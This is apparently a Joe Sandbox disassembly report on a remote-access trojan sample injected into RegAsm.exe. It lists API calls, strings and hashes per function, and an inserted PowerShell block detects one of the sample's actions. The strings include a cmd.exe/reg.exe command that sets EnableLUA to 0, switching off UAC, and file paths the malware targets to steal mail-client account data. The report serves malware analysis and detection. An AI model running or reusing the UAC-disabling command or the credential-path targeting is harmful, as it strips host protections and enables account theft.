                                                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                          APIs
                                                          • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • _free.LIBCMT ref: 0044824C
                                                          • _free.LIBCMT ref: 00448274
                                                          • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • _abort.LIBCMT ref: 00448293
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                          • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                          • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                          • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                          • _free.LIBCMT ref: 10005B2D
                                                          • _free.LIBCMT ref: 10005B55
                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                          • _abort.LIBCMT ref: 10005B74
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                          • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                          • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                          • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                          • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                          • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                          • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                          • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                          • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                          • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                          APIs
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                          • API String ID: 4036392271-1520055953
                                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                          • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID: XQG
                                                          • API String ID: 1958988193-3606453820
                                                          • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                          • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                          • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                          • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                          • GetLastError.KERNEL32 ref: 0041D580
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                          • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                          • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                          • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                          • CloseHandle.KERNEL32(?), ref: 004077AA
                                                          • CloseHandle.KERNEL32(?), ref: 004077AF
                                                          Strings
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                          • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                          • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                          • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                          • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
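Practitioner check, added here and not part of the Joe Sandbox report or of the sample's own code: the function above launches cmd.exe /k reg.exe ADD ... EnableLUA /t REG_DWORD /d 0 /f, which switches UAC off at the next reboot. The PowerShell below, run from an elevated session on a host suspected of having executed this sample, reads the value back and searches Security event 4688 for the same reg.exe command line. It assumes 'Audit Process Creation' and 'Include command line in process creation events' were already enabled on the host; the seven-day lookback and the function names are illustrative choices.

```powershell
# Added example, not code from the report or the sample: check a host for the
# EnableLUA=0 change that the RegAsm-hosted payload above performs via
# cmd.exe /k reg.exe ADD ... Run from an elevated PowerShell session.

$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacState {
    # Returns the EnableLUA DWORD, or $null when the value is absent.
    $item = Get-ItemProperty -Path $policyKey -Name EnableLUA -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.EnableLUA
}

function Find-EnableLuaTamper {
    param([datetime]$Since = (Get-Date).AddDays(-7))   # lookback window is an assumption
    # Security 4688 carries the command line only when 'Audit Process Creation' and
    # 'Include command line in process creation events' are both enabled.
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $cmd = $data['CommandLine']
        # Match the sample's reg.exe invocation loosely: any write of EnableLUA to 0 under
        # the Policies\System key, whether the cmd.exe or the reg.exe 4688 event logged it.
        if ($cmd -and $cmd -match 'Policies\\System' -and $cmd -match 'EnableLUA' -and $cmd -match '/d\s*0\b') {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                Parent      = $data['ParentProcessName']
                Process     = $data['NewProcessName']
                CommandLine = $cmd
            }
        }
    }
}

$state = Get-UacState
if ($null -eq $state) {
    Write-Warning "EnableLUA is missing from $policyKey; treat as suspicious and verify UAC prompting manually."
} elseif ($state -eq 0) {
    Write-Warning "EnableLUA = 0: UAC is disabled (the reg.exe ADD takes effect at the next reboot)."
} else {
    Write-Output "EnableLUA = $state (UAC enabled)."
}

Find-EnableLuaTamper | Format-Table -AutoSize
```

Reading the Security log needs administrative rights, and without the two audit settings the CommandLine field is empty and the search returns nothing; on hosts running Sysmon the same command line is available in Sysmon Event ID 1 (ProcessCreate) instead. Because both the cmd.exe and the reg.exe process-creation events contain the reg.exe arguments, a single run of the sample normally produces two matching rows.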
                                                          Strings
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                                          • SG, xrefs: 004076DA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 0-643455097
                                                          • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                          • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                          • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                          • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                          • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                          • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                          • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                          • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                          • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                          • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                          APIs
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                          • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                          • String ID: Alarm triggered
                                                          • API String ID: 614609389-2816303416
                                                          • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                          • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                          • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                          • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                                          Strings
                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                          • API String ID: 3024135584-2418719853
                                                          • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                          • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                          • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                          • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                          • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                          • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                          • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                          APIs
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • _free.LIBCMT ref: 00444E06
